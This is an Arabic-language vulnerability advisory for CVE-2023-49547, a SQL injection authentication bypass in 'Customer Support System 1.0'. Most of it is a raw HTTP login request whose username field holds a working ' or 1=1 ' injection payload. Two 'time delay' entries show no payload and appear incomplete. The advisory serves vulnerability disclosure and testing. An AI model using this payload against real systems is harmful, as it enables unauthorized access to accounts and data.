
نظام دعم العملاء 1.0 - تجاوز تسجيل الدخول عبر حقن SQL
الوصف: نظام دعم العملاء الإصدار 1.0 عرضة لحقن SQL. تمكن ثغرة حقن SQL في نظام دعم العملاء 1.0 المهاجمين غير المصادقين عن بُعد من تجاوز عملية المصادقة عن طريق استغلال معلمة اسم المستخدم.
إصدار المنتج المعرض للخطر: نظام دعم العملاء 1.0
مؤلف CVE: Geraldo Alcântara
التاريخ: 28/11/2023
تم التأكيد في: 19/12/2023
CVE: CVE-2023-49547
تم الاختبار على: Windows
الطلب: تجاوز المصادقة:
POST /customer_support/ajax.php?action=login HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 54
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/login.php
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=abige9ar0b1bi3qcf9mkv258o3
username='+or+1%3D1+or+''%3D'&password=password&type=1
تأخير زمني: 20 ثانية

تأخير زمني: 2 ثانية

المكتشفون/الإسناد:
Geraldo Alcântara